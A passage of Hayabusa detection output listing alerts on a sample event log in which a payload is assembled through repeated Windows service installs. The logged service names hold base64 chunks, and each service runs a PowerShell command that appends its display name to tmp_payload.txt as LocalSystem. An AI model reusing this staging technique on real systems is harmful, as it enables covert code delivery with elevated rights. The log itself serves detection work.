IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:46.913 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:46.913 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:46.913 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:48.360 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:48.360 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:48.360 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:49.806 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:49.806 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:49.806 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:51.269 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:51.269 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:51.269 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:52.716 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:52.716 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:52.716 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:54.170 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:54.170 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:54.170 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:55.604 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:55.604 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:55.604 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:57.053 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:57.053 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:57.053 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:58.514 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:58.514 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:58.514 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:59.975 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:59.975 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:59.975 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:01.428 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:01.428 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:01.428 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:02.892 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:02.892 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:02.892 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:04.364 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:04.364 